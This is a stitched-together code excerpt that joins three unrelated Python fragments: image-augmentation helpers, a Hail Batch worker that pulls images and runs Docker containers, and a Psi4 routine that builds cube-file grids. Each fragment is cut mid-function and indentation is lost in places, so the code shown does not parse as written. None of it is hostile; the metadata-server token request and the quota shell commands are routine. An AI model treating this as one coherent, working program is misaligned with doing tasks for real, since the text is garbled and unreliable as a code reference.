            # NOTE(review): this matches the target width and scales the
            # height up by the aspect ratio, which can exceed `height`
            # for elongated portrait inputs and would make `top` negative
            # below -- confirm input/target combinations are bounded.
            img = squeeze(img, width, int(width * aspect_ratio))
        else:
            img = squeeze(img, width, int(width / aspect_ratio))
    # Place original image at center of new image
    top = (height - img.shape[0]) // 2
    left = (width - img.shape[1]) // 2
    new_img[top:top + img.shape[0], left:left + img.shape[1]] = img
    return new_img
###################### AUGMENTATION ######################
def augment(img, augmentation={}, count=3, probability=0.5):
    """Randomly apply up to `count` of the configured augmentations.

    `augmentation` maps method names ('flip', 'rotate', ...) to their
    parameters. Each of the `count` rounds applies one randomly chosen,
    not-yet-used method with the given `probability`. Returns the
    (possibly augmented) image.

    Note: the mutable default argument is harmless here because the dict
    is deep-copied before use and never mutated.
    """
    # Make working copy
    augmentations = copy.deepcopy(augmentation)
    # Choose number of augmentations according to count
    # Count = 3 means either 0, 1, 2 or 3 different augmentations
    while count > 0 and len(augmentations) > 0:
        # Roll the dice if we do augment or not
        if RANDOM.choice([True, False], p=[probability, 1 - probability]):
            # Choose one method. BUG FIX: list() is required on Python 3,
            # where numpy's choice() rejects a dict_keys view.
            aug = RANDOM.choice(list(augmentations.keys()))
            # Call augementation methods
            if aug == 'flip':
                img = flip(img, augmentations[aug])
            elif aug == 'rotate':
                img = rotate(img, augmentations[aug])
            elif aug == 'zoom':
                img = zoom(img, augmentations[aug])
            elif aug == 'crop':
                if isinstance(augmentations[aug], float):
                    img = crop(img, top=augmentations[aug], left=augmentations[aug], right=augmentations[aug], bottom=augmentations[aug])
                else:
                    img = crop(img, top=augmentations[aug][0], left=augmentations[aug][1], bottom=augmentations[aug][2], right=augmentations[aug][3])
            elif aug == 'roll':
                img = roll(img, vertical=augmentations[aug], horizontal=augmentations[aug])
            elif aug == 'roll_v':
                img = roll(img, vertical=augmentations[aug], horizontal=0)
            elif aug == 'roll_h':
                img = roll(img, vertical=0, horizontal=augmentations[aug])
            elif aug == 'mean':
                img = mean(img, augmentations[aug])
            elif aug == 'noise':
                img = noise(img, augmentations[aug])
            elif aug == 'dropout':
                img = dropout(img, augmentations[aug])
            elif aug == 'blackout':
                img = blackout(img, augmentations[aug])
            elif aug == 'blur':
                img = blur(img, augmentations[aug])
            elif aug == 'brightness':
                img = brightness(img, augmentations[aug])
            elif aug == 'multiply':
                img = randomMultiply(img, augmentations[aug])
            elif aug == 'hue':
                img = hue(img, augmentations[aug])
            elif aug == 'lightness':
                img = lightness(img, augmentations[aug])
            elif aug == 'add':
                img = add(img, augmentations[aug])
            else:
                pass
            # Remove key so we avoid duplicate augmentations
            del augmentations[aug]
        # Count (even if we did not augment)
        count -= 1
    return img
def flip(img, flip_axis=1):
    # Mirror the image (cv2 convention: 1 = horizontal, 0 = vertical,
    # negative = both axes).
    return cv2.flip(img, flip_axis)
def rotate(img, angle, zoom=1.0):
    """Rotate around the image center by a random angle drawn from
    [-angle, angle], optionally zooming."""
    h, w = img.shape[:2]
    center = (w / 2, h / 2)
    random_angle = RANDOM.uniform(-angle, angle)
    rotation = cv2.getRotationMatrix2D(center, random_angle, zoom)
    return cv2.warpAffine(img, rotation, (w, h))
def zoom(img, amount=0.33):
    """Zoom into the image center by a random factor up to 1 + amount."""
    h, w = img.shape[:2]
    factor = 1 + RANDOM.uniform(0, amount)
    transform = cv2.getRotationMatrix2D((w / 2, h / 2), 0, factor)
    return cv2.warpAffine(img, transform, (w, h))
def crop(img, top=0.1, left=0.1, bottom=0.1, right=0.1):
    """Cut a random margin (at least 1 px) from every side, then scale
    the remainder back to the original size."""
    h, w = img.shape[:2]
    # Draw the four margins in the same order as before so the RNG
    # stream stays identical: top, left, bottom, right.
    margin_top = max(1, int(h * RANDOM.uniform(0, top)))
    margin_left = max(1, int(w * RANDOM.uniform(0, left)))
    margin_bottom = max(1, int(h * RANDOM.uniform(0, bottom)))
    margin_right = max(1, int(w * RANDOM.uniform(0, right)))
    cropped = img[margin_top:-margin_bottom, margin_left:-margin_right]
    return squeeze(cropped, w, h)
def roll(img, vertical=0.1, horizontal=0.1):
    """Cyclically shift the image by a random fraction of its size on
    each axis."""
    v_shift = int(img.shape[0] * RANDOM.uniform(-vertical, vertical))
    img = np.roll(img, v_shift, axis=0)
    h_shift = int(img.shape[1] * RANDOM.uniform(-horizontal, horizontal))
    img = np.roll(img, h_shift, axis=1)
    return img
def mean(img, normalize=True):
    """Mean-subtract the image (clipped at zero) and optionally rescale
    so the maximum becomes 1."""
    img = substractMean(img, True)
    if normalize and img.max() != 0:
        img /= img.max()
    return img
def noise(img, amount=0.05):
    """Add Gaussian noise (sigma itself drawn at random, bounded by
    sqrt(amount)); the returned array is clipped to [0, 1]."""
    sigma = RANDOM.uniform(0, amount ** 0.5)
    img += RANDOM.normal(0.0, sigma, img.shape)
    return np.clip(img, 0.0, 1.0)
def dropout(img, amount=0.25):
    """Zero out roughly `amount` of the pixels (element-wise Bernoulli
    mask)."""
    draws = RANDOM.uniform(0, 1, img.shape)
    mask = np.where(draws <= amount, 0.0, 1.0)
    return img * mask
def blackout(img, amount=0.25):
    """Zero a randomly placed vertical stripe covering `amount` of the
    image width (mutates img in place)."""
    stripe_width = int(img.shape[1] * amount)
    stripe_start = RANDOM.randint(0, img.shape[1] - stripe_width)
    img[:, stripe_start:stripe_start + stripe_width] = 0
    return img
def blur(img, kernel_size=3):
    # Box blur with a square kernel_size x kernel_size kernel.
    return cv2.blur(img, (kernel_size, kernel_size))
def brightness(img, amount=0.25):
    """Scale all pixels by a single random factor in
    [1 - amount, 1 + amount]; result clipped to [0, 1]."""
    img *= RANDOM.uniform(1 - amount, 1 + amount)
    return np.clip(img, 0.0, 1.0)
def randomMultiply(img, amount=0.25):
    """Scale every pixel by its own random factor in
    [1 - amount, 1 + amount]; result clipped to [0, 1]."""
    img *= RANDOM.uniform(1 - amount, 1 + amount, size=img.shape)
    return np.clip(img, 0.0, 1.0)
def hue(img, amount=0.1):
    """Randomly scale the hue channel of a BGR image.

    Non-color (e.g. grayscale) input is returned unchanged, best effort.
    """
    try:
        # Only works with BGR images
        hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
        hsv[:, :, 0] *= RANDOM.uniform(1 - amount, 1 + amount)
        # BUG FIX: ndarray.clip is not in-place -- the previous code
        # discarded the clipped result, leaving out-of-range hues.
        hsv[:, :, 0] = hsv[:, :, 0].clip(0, 360)
        img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; any failure keeps the original image.
        pass
    return img
def lightness(img, amount=0.25):
    """Randomly scale the L (lightness) channel of a BGR image.

    Non-color (e.g. grayscale) input is returned unchanged, best effort.
    """
    try:
        # Only works with BGR images
        lab = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
        lab[:, :, 0] *= RANDOM.uniform(1 - amount, 1 + amount)
        # BUG FIX: ndarray.clip is not in-place -- the previous code
        # discarded the clipped result, leaving out-of-range values.
        lab[:, :, 0] = lab[:, :, 0].clip(0, 255)
        img = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; any failure keeps the original image.
        pass
    return img
def add(img, items):
# Choose one item from List
index = RANDOM.randint(len(items))
# Open and resize | |
from typing import Optional
import os
import json
import sys
import re
import logging
import asyncio
import random
import traceback
import base64
import uuid
import shutil
import aiohttp
import aiohttp.client_exceptions
from aiohttp import web
import async_timeout
import concurrent
import aiodocker
from aiodocker.exceptions import DockerError
import google.oauth2.service_account
from hailtop.utils import (time_msecs, request_retry_transient_errors,
sleep_and_backoff, retry_all_errors, check_shell,
CalledProcessError, check_shell_output, is_google_registry_image,
find_spark_home)
from hailtop.httpx import client_session
from hailtop.batch_client.parse import (parse_cpu_in_mcpu, parse_image_tag,
parse_memory_in_bytes, parse_storage_in_bytes)
from hailtop.batch.hail_genetics_images import HAIL_GENETICS, HAIL_GENETICS_IMAGES
from hailtop import aiotools
# import uvloop
from hailtop.config import DeployConfig
from hailtop.hail_logging import configure_logging
from ..utils import (adjust_cores_for_memory_request, cores_mcpu_to_memory_bytes,
adjust_cores_for_packability, adjust_cores_for_storage_request,
cores_mcpu_to_storage_bytes, storage_gib_to_bytes)
from ..semaphore import FIFOWeightedSemaphore
from ..log_store import LogStore
from ..globals import HTTP_CLIENT_MAX_SIZE, STATUS_FORMAT_VERSION
from ..batch_format_version import BatchFormatVersion
from ..worker_config import WorkerConfig
from ..public_gcr_images import public_gcr_images
from .flock import Flock
# uvloop.install()
# Configure logging before the first getLogger() call.
configure_logging()
log = logging.getLogger('batch-worker')
# Hard per-operation timeouts (seconds) for classes of docker calls.
MAX_DOCKER_IMAGE_PULL_SECS = 20 * 60
MAX_DOCKER_WAIT_SECS = 5 * 60
MAX_DOCKER_OTHER_OPERATION_SECS = 1 * 60
# Worker identity and configuration, injected through the environment
# by the batch driver when the VM is provisioned.
CORES = int(os.environ['CORES'])
NAME = os.environ['NAME']
NAMESPACE = os.environ['NAMESPACE']
# ACTIVATION_TOKEN
IP_ADDRESS = os.environ['IP_ADDRESS']
BATCH_LOGS_BUCKET_NAME = os.environ['BATCH_LOGS_BUCKET_NAME']
INSTANCE_ID = os.environ['INSTANCE_ID']
PROJECT = os.environ['PROJECT']
PUBLIC_GCR_IMAGES = public_gcr_images(PROJECT)
# WORKER_CONFIG is delivered as base64-encoded JSON.
WORKER_CONFIG = json.loads(base64.b64decode(os.environ['WORKER_CONFIG']).decode())
MAX_IDLE_TIME_MSECS = int(os.environ['MAX_IDLE_TIME_MSECS'])
WORKER_DATA_DISK_MOUNT = os.environ['WORKER_DATA_DISK_MOUNT']
BATCH_WORKER_IMAGE = os.environ['BATCH_WORKER_IMAGE']
# Echo the received (non-secret) configuration for debuggability.
log.info(f'CORES {CORES}')
log.info(f'NAME {NAME}')
log.info(f'NAMESPACE {NAMESPACE}')
# ACTIVATION_TOKEN
log.info(f'IP_ADDRESS {IP_ADDRESS}')
log.info(f'BATCH_LOGS_BUCKET_NAME {BATCH_LOGS_BUCKET_NAME}')
log.info(f'INSTANCE_ID {INSTANCE_ID}')
log.info(f'PROJECT {PROJECT}')
log.info(f'WORKER_CONFIG {WORKER_CONFIG}')
log.info(f'MAX_IDLE_TIME_MSECS {MAX_IDLE_TIME_MSECS}')
log.info(f'WORKER_DATA_DISK_MOUNT {WORKER_DATA_DISK_MOUNT}')
worker_config = WorkerConfig(WORKER_CONFIG)
# The provisioned machine must match the advertised worker config.
assert worker_config.cores == CORES
deploy_config = DeployConfig('gce', NAMESPACE, {})
# Process-wide singletons, initialized during startup (None until then).
docker: Optional[aiodocker.Docker] = None
port_allocator: Optional['PortAllocator'] = None
worker: Optional['Worker'] = None
class PortAllocator:
    """Hands out host ports from a fixed pool of ten, starting at 46572."""

    def __init__(self):
        self.ports = asyncio.Queue()
        first_port = 46572
        for candidate in range(first_port, first_port + 10):
            self.ports.put_nowait(candidate)

    async def allocate(self):
        # Blocks until a port is available in the pool.
        return await self.ports.get()

    def free(self, port):
        # Return a previously allocated port to the pool.
        self.ports.put_nowait(port)
def docker_call_retry(timeout, name):
    # Wrap an async docker call with a per-attempt `timeout` and retries
    # (with exponential backoff) on transient failures; `name` is only
    # used in log messages. Returns an async wrapper(f, *args, **kwargs).
    async def wrapper(f, *args, **kwargs):
        delay = 0.1
        while True:
            try:
                return await asyncio.wait_for(f(*args, **kwargs), timeout)
            except DockerError as e:
                # 408 request timeout, 503 service unavailable
                if e.status == 408 or e.status == 503:
                    log.warning(f'in docker call to {f.__name__} for {name}, retrying', stack_info=True, exc_info=True)
                # Known transient 500s, matched by message:
                # DockerError(500, 'Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
                # DockerError(500, 'error creating overlay mount to /var/lib/docker/overlay2/545a1337742e0292d9ed197b06fe900146c85ab06e468843cd0461c3f34df50d/merged: device or resource busy'
                # DockerError(500, 'Get https://gcr.io/v2/: dial tcp: lookup gcr.io: Temporary failure in name resolution')
                elif e.status == 500 and ("request canceled while waiting for connection" in e.message
                                          or re.match("error creating overlay mount.*device or resource busy", e.message)
                                          or "Temporary failure in name resolution" in e.message):
                    log.warning(f'in docker call to {f.__name__} for {name}, retrying', stack_info=True, exc_info=True)
                else:
                    # Anything else is treated as permanent.
                    raise
            except (aiohttp.client_exceptions.ServerDisconnectedError, asyncio.TimeoutError):
                log.warning(f'in docker call to {f.__name__} for {name}, retrying', stack_info=True, exc_info=True)
            # Back off before the next attempt.
            delay = await sleep_and_backoff(delay)
    return wrapper
async def create_container(config, name):
    """Create a docker container, tolerating name-conflict and
    missing-image races; gives up after 10 accumulated failures."""
    delay = 0.1
    error = 0

    async def handle_error(e):
        # Count a failure and back off; abort the create after 10.
        nonlocal error, delay
        error += 1
        if error < 10:
            delay = await sleep_and_backoff(delay)
            return
        # BUG FIX: the message was missing its f-prefix and rendered the
        # literal text "{error}" instead of the failure count.
        raise ValueError(f'encountered {error} failures in create_container; aborting') from e

    while True:
        try:
            return await docker.containers.create(config, name=name)
        except DockerError as e:
            # 409: a container with this name already exists (e.g. from a
            # previous attempt) -- wait briefly, then adopt it.
            if e.status == 409:
                try:
                    delay = await sleep_and_backoff(delay)
                    return await docker.containers.get(name)
                except DockerError as eget:
                    # 404: it vanished between create and get; retry.
                    if eget.status == 404:
                        await handle_error(eget)
                        continue
            # 404 "No such image": the image pull may still be racing us.
            if e.status == 404 and 'No such image' in e.message:
                await handle_error(e)
                continue
            raise
async def start_container(container):
    """Start `container`, tolerating the already-started case and one
    known transient runc failure."""
    try:
        return await container.start()
    except DockerError as e:
        if e.status == 304:
            # Already running -- nothing to do.
            return
        if e.status == 500 and e.message == 'OCI runtime start failed: container process is already dead: unknown':
            # Known transient runc failure; a restart recovers it.
            log.info(f'restarting container {container}')
            return await container.restart()
        raise
async def stop_container(container):
    """Stop `container`; a 304 (already stopped) is not an error."""
    try:
        return await container.stop()
    except DockerError as e:
        if e.status != 304:
            raise
async def delete_container(container, *args, **kwargs):
    """Delete `container`, ignoring "already gone" (404) and
    "removal already in progress" (409) responses."""
    try:
        return await container.delete(*args, **kwargs)
    except DockerError as e:
        if e.status not in (404, 409):
            raise
class JobDeletedError(Exception):
    """Raised inside container steps when the owning job has been deleted."""
    pass
class JobTimeoutError(Exception):
    """Marks a job that exceeded its time limit (raised by code outside
    this excerpt)."""
    pass
class ContainerStepManager:
    """Async context manager tracking one named step of a container's
    lifecycle: optionally flips the container state and records
    start/finish/duration timestamps into ``container.timing``."""

    def __init__(self, container, name, state):
        self.container = container
        self.state = state
        self.name = name
        self.timing = None
        self._deleted = False

    async def __aenter__(self):
        container = self.container
        if container.job.deleted:
            # The surrounding job vanished: abort the step.
            self._deleted = True
            raise JobDeletedError()
        if self.state:
            log.info(f'{container} state changed: {container.state} => {self.state}')
            container.state = self.state
        self.timing = {'start_time': time_msecs()}
        container.timing[self.name] = self.timing

    async def __aexit__(self, exc_type, exc, tb):
        if self._deleted:
            # Nothing was started; nothing to record.
            return
        end = time_msecs()
        self.timing['finish_time'] = end
        self.timing['duration'] = end - self.timing['start_time']
def worker_fraction_in_1024ths(cpu_in_mcpu):
    """Convert a millicpu request into docker CpuShares-style 1024ths of
    this worker's total cores."""
    total_mcpu = CORES * 1000
    return 1024 * cpu_in_mcpu // total_mcpu
def user_error(e):
    """True iff the exception is a DockerError caused by the user's own
    job spec (unpullable image or missing executable)."""
    if not isinstance(e, DockerError):
        return False
    if e.status == 404 and 'pull access denied' in e.message:
        return True
    return e.status == 400 and 'executable file not found' in e.message
class Container:
def __init__(self, job, name, spec):
    self.job = job
    self.name = name
    self.spec = spec

    # Normalize the image reference: default the tag to "latest" and
    # redirect hailgenetics/* images to this project's GCR mirror.
    repository, tag = parse_image_tag(self.spec['image'])
    if not tag:
        log.info(f'adding latest tag to image {self.spec["image"]} for {self}')
        tag = 'latest'
    if repository in HAIL_GENETICS_IMAGES:
        repository_name_without_prefix = repository[len(HAIL_GENETICS):]
        repository = f'gcr.io/{PROJECT}/{repository_name_without_prefix}'
    self.repository = repository
    self.tag = tag
    self.image = f'{self.repository}:{self.tag}'

    self.port = self.spec.get('port')
    self.host_port = None
    self.timeout = self.spec.get('timeout')

    # Mutable runtime state, filled in as the container progresses.
    self.container = None
    self.state = 'pending'
    self.error = None
    self.timing = {}
    self.container_status = None
    self.log = None
    self.overlay_path = None
def container_config(self):
weight = worker_fraction_in_1024ths(self.spec['cpu'])
host_config = {
'CpuShares': weight,
'Memory': self.spec['memory'],
'BlkioWeight': min(weight, 1000)
}
config = {
"AttachStdin": False,
"AttachStdout": False,
"AttachStderr": False,
"Tty": False,
'OpenStdin': False,
'Cmd': self.spec['command'],
'Image': self.image,
'Entrypoint': ''
}
env = self.spec.get('env', [])
if self.port is not None:
assert self.host_port is not None
config['ExposedPorts'] = {
f'{self.port}/tcp': {}
}
host_config['PortBindings'] = {
f'{self.port}/tcp': [{
'HostIp': '',
'HostPort': str(self.host_port)
}]
}
env = list(env)
env.append(f'HAIL_BATCH_WORKER_PORT={self.host_port}')
env.append(f'HAIL_BATCH_WORKER_IP={IP_ADDRESS}')
volume_mounts = self.spec.get('volume_mounts')
if volume_mounts:
host_config['Binds'] = volume_mounts
if env:
config['Env'] = env
network = self.spec.get('network')
if network is None:
network = 'public'
host_config['NetworkMode'] = network # not documented, I used strace to inspect the packets
config['HostConfig'] = host_config
return config
def step(self, name, **kwargs):
state = kwargs.get('state', name)
return ContainerStepManager(self, name, state)
async def get_container_status(self):
if not self.container:
return None
try:
c = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(self.container.show)
except DockerError as e:
if e.status == 404:
return None
raise
cstate = c['State']
status = {
'state': cstate['Status'],
'started_at': cstate['StartedAt'],
'finished_at': cstate['FinishedAt'],
'out_of_memory': cstate['OOMKilled']
}
cerror = cstate['Error']
if cerror:
status['error'] = cerror
else:
status['exit_code'] = cstate['ExitCode']
return status
async def ensure_image_is_pulled(self, auth=None):
try:
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
docker.images.get, self.image)
except DockerError as e:
if e.status == 404:
await docker_call_retry(MAX_DOCKER_IMAGE_PULL_SECS, f'{self}')(
docker.images.pull, self.image, auth=auth)
def current_user_access_token(self):
key = base64.b64decode(self.job.gsa_key['key.json']).decode()
return {'username': '_json_key', 'password': key}
    async def batch_worker_access_token(self):
        """Fetch an OAuth2 access token for the worker's own service account.

        Queries the GCE instance metadata server (169.254.169.254); the token
        is returned in the username/password form Docker registry auth expects.
        """
        async with aiohttp.ClientSession(raise_for_status=True, timeout=aiohttp.ClientTimeout(total=60)) as session:
            async with await request_retry_transient_errors(
                    session, 'POST',
                    'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token',
                    headers={'Metadata-Flavor': 'Google'}) as resp:
                access_token = (await resp.json())['access_token']
                return {'username': 'oauth2accesstoken', 'password': access_token}
    async def run(self, worker):
        """Drive the container through its full lifecycle.

        Steps: pull image, (optionally) allocate a host port, create, register
        the overlay dir under the job's XFS quota project, start, wait (with
        timeout), upload the log, delete. Sets self.state to a terminal value
        ('succeeded', 'failed', or 'error') and records errors on self.error.
        """
        try:
            async with self.step('pulling'):
                is_gcr_image = is_google_registry_image(self.image)
                is_public_gcr_image = self.repository in PUBLIC_GCR_IMAGES
                if not is_gcr_image:
                    await self.ensure_image_is_pulled()
                elif is_public_gcr_image:
                    # Public GCR images: authenticate as the worker itself.
                    auth = await self.batch_worker_access_token()
                    await self.ensure_image_is_pulled(auth=auth)
                else:
                    # Pull to verify this user has access to this
                    # image.
                    # FIXME improve the performance of this with a
                    # per-user image cache.
                    auth = self.current_user_access_token()
                    await docker_call_retry(MAX_DOCKER_IMAGE_PULL_SECS, f'{self}')(
                        docker.images.pull, self.image, auth=auth)

            if self.port is not None:
                async with self.step('allocating_port'):
                    self.host_port = await port_allocator.allocate()

            async with self.step('creating'):
                config = self.container_config()
                log.info(f'starting {self}')
                self.container = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
                    create_container, config, name=f'batch-{self.job.batch_id}-job-{self.job.job_id}-{self.name}')

            # Register the container's overlay directory under the job's XFS
            # project so its disk usage is quota-limited.
            c = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(self.container.show)
            merged_overlay_path = c['GraphDriver']['Data']['MergedDir']
            assert merged_overlay_path.endswith('/merged')
            self.overlay_path = merged_overlay_path[:-7].replace(WORKER_DATA_DISK_MOUNT, '/host')
            os.makedirs(f'{self.overlay_path}/', exist_ok=True)

            async with Flock('/xfsquota/projects', pool=worker.pool):
                with open('/xfsquota/projects', 'a') as f:
                    f.write(f'{self.job.project_id}:{self.overlay_path}\n')

            await check_shell_output(f'xfs_quota -x -D /xfsquota/projects -P /xfsquota/projid -c "project -s {self.job.project_name}" /host/')

            async with self.step('starting'):
                await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
                    start_container, self.container)

            timed_out = False
            async with self.step('running'):
                try:
                    async with async_timeout.timeout(self.timeout):
                        await docker_call_retry(MAX_DOCKER_WAIT_SECS, f'{self}')(self.container.wait)
                except asyncio.TimeoutError:
                    # Note the timeout, but still upload logs and clean up first.
                    timed_out = True

            self.container_status = await self.get_container_status()

            async with self.step('uploading_log'):
                await worker.log_store.write_log_file(
                    self.job.format_version, self.job.batch_id,
                    self.job.job_id, self.job.attempt_id, self.name,
                    await self.get_container_log())

            async with self.step('deleting'):
                await self.delete_container()

            if timed_out:
                raise JobTimeoutError(f'timed out after {self.timeout}s')

            # Derive the terminal state from the container's exit status.
            if 'error' in self.container_status:
                self.state = 'error'
            elif self.container_status['exit_code'] == 0:
                self.state = 'succeeded'
            else:
                self.state = 'failed'
        except Exception as e:
            # Job deletion and timeouts are expected paths; only log the rest.
            if not isinstance(e, (JobDeletedError, JobTimeoutError)):
                log.exception(f'while running {self}')
            self.state = 'error'
            self.error = traceback.format_exc()
        finally:
            # Also covers early-exception paths; delete_container is guarded.
            await self.delete_container()
async def get_container_log(self):
logs = await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
self.container.log, stderr=True, stdout=True)
self.log = "".join(logs)
return self.log
async def get_log(self):
if self.container:
return await self.get_container_log()
return self.log
async def delete_container(self):
if self.overlay_path:
path = self.overlay_path.replace('/', r'\/')
async with Flock('/xfsquota/projects', pool=worker.pool):
await check_shell(f"sed -i '/:{path}/d' /xfsquota/projects")
if self.container:
try:
log.info(f'{self}: deleting container')
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
stop_container, self.container)
# v=True deletes anonymous volumes created by the container
await docker_call_retry(MAX_DOCKER_OTHER_OPERATION_SECS, f'{self}')(
delete_container, self.container, v=True)
self.container | |
<filename>pdft/libcubeprop.py
# Copyright (c) 2007-2019 The Psi4 Developers.
# Copyright (c) 2014-2018, The Psi4NumPy Developers.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Psi4NumPy Developers nor the names of any
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
TO BE FINISHED: ARBITRARY GIVEN GRID.
"""
import numpy as np
import psi4
def build_grid(wfn, L, D):
    """
    Creates origin and extent of the cube file grid.

    Parameters
    ----------
    wfn : psi4.core.Wavefunction
        Wavefunction object from Psi4 energy calculation
    L : List
        Spacial extent (padding beyond the molecule) for x,y,z directions
    D : List
        Grid spacing in bohrs for x,y,z directions

    Returns
    -------
    O : numpy array
        Origin for the cubefile
    N : numpy array
        Number of points for each coordinate (stored as floats; callers
        cast with int())
    """
    geometry = wfn.molecule().full_geometry().np

    # Bounding box of the nuclei along each axis (replaces the manual
    # per-atom min/max loop; the previously computed Xdel was unused).
    Xmin = np.min(geometry, axis=0)
    Xmax = np.max(geometry, axis=0)

    N = np.zeros(3)
    O = np.zeros(3)
    for k in range(3):
        extent = Xmax[k] - Xmin[k] + 2.0 * L[k]
        # Truncate, then round up if the grid would not span the extent.
        N[k] = int(extent / D[k])
        if D[k] * N[k] < extent:
            N[k] += 1
        # Center the grid on the molecule.
        O[k] = Xmin[k] - (D[k] * N[k] - (Xmax[k] - Xmin[k])) / 2.0
    return O, N
def populate_grid(wfn, O, N, D):
    """
    Build cube grid

    Parameters
    ----------
    wfn : psi4.core.Wavefunction
        Wavefunction object from Psi4 energy calculation
    O : List
        Origin for the cubefile
    N : List
        Number of points for each coordinate
    D : List
        Grid Spacing in bohrs for x,y,z directions

    Returns
    -------
    block : List
        Set of psi4.core.BlockOPoints for cube grid
    points : psi4.core.RKSFunctions
        Function evaluator sized for the largest block
    nxyz : integer
        number of points in each direction for rectangular grid
    npoints : int
        total number of points in grid
    """
    epsilon = psi4.core.get_global_option("CUBIC_BASIS_TOLERANCE")
    basis = psi4.core.BasisSet.build(wfn.molecule(), 'ORBITAL', wfn.basisset().name())
    extens = psi4.core.BasisExtents(basis, epsilon)

    npoints = (N[0]) * (N[1]) * (N[2])
    x = np.zeros(int(npoints))
    y = np.zeros(int(npoints))
    z = np.zeros(int(npoints))
    w = np.zeros(int(npoints))

    # NOTE(review): "CUBIC_BlOCK_MAX_POINTS" has a lowercase 'l'; Psi4 option
    # lookup appears to tolerate this, but the spelling should be confirmed
    # against the registered option name "CUBIC_BLOCK_MAX_POINTS".
    max_points = psi4.core.get_global_option("CUBIC_BlOCK_MAX_POINTS")
    # Blocks are ~cubic with at most max_points points per block.
    nxyz = int(np.round(max_points ** (1 / 3)))
    block = []
    offset = 0
    i_start = 0
    j_start = 0
    k_start = 0
    x_plot, y_plot, z_plot = [], [], []
    # Tile the rectangular grid into nxyz^3 sub-blocks; the trailing block in
    # each direction is truncated to the remaining points.
    for i in range(i_start, int(N[0] + 1), nxyz):
        ni = int(N[0]) - i if i + nxyz > N[0] else nxyz
        for j in range(j_start, int(N[1] + 1), nxyz):
            nj = int(N[1]) - j if j + nxyz > N[1] else nxyz
            for k in range(k_start, int(N[2] + 1), nxyz):
                nk = int(N[2]) - k if k + nxyz > N[2] else nxyz
                x_in, y_in, z_in, w_in = [], [], [], []
                block_size = 0
                for ii in range(i, i + ni):
                    for jj in range(j, j + nj):
                        for kk in range(k, k + nk):
                            x[offset] = O[0] + ii * D[0]
                            y[offset] = O[1] + jj * D[1]
                            z[offset] = O[2] + kk * D[2]
                            # Uniform quadrature weight: the cell volume.
                            w[offset] = D[0] * D[1] * D[2]
                            x_plot.append(x[offset])
                            y_plot.append(y[offset])
                            z_plot.append(z[offset])
                            x_in.append(x[offset])
                            y_in.append(y[offset])
                            z_in.append(z[offset])
                            w_in.append(w[offset])
                            offset += 1
                            block_size += 1
                x_out = psi4.core.Vector.from_array(np.array(x_in))
                y_out = psi4.core.Vector.from_array(np.array(y_in))
                z_out = psi4.core.Vector.from_array(np.array(z_in))
                w_out = psi4.core.Vector.from_array(np.array(w_in))
                block.append(psi4.core.BlockOPoints(x_out, y_out, z_out, w_out, extens))

    # Size the evaluator by the largest number of basis functions touched by
    # any single block.
    max_functions = 0
    for i in range(max_functions, len(block)):
        max_functions = max_functions if max_functions > len(block[i].functions_local_to_global()) else len(
            block[i].functions_local_to_global())
    points = psi4.core.RKSFunctions(basis, int(npoints), max_functions)
    points.set_ansatz(0)

    # return block, points, nxyz, npoints, [x_plot, y_plot, z_plot]
    return block, points, nxyz, npoints
def add_density_vector_basis(npoints, points, block, array):
    """
    Computes a scalar field on the grid from a vector of basis coefficients.

    Parameters
    ----------
    npoints : int
        total number of points
    points : psi4.core.RKSFunctions
        Function evaluator for the orbital basis
    block : list
        Set of psi4.core.BlockOPoints for cube grid
    array : numpy array
        Coefficient vector in the orbital basis (one entry per basis function)

    Returns
    -------
    v : numpy array
        Array with the field values on the grid
    [x, y, z, w] : list of numpy arrays
        Grid coordinates and quadrature weights, block-ordered like v
    """
    v = np.zeros(int(npoints))
    x = np.zeros(int(npoints))
    y = np.zeros(int(npoints))
    z = np.zeros(int(npoints))
    w = np.zeros(int(npoints))

    # A (zero) density-matrix pointer is required before compute_points runs;
    # only the basis values ("PHI") are used below.
    matrix = psi4.core.Matrix.from_array(np.zeros((array.shape[0], array.shape[0])))
    points.set_pointers(matrix)

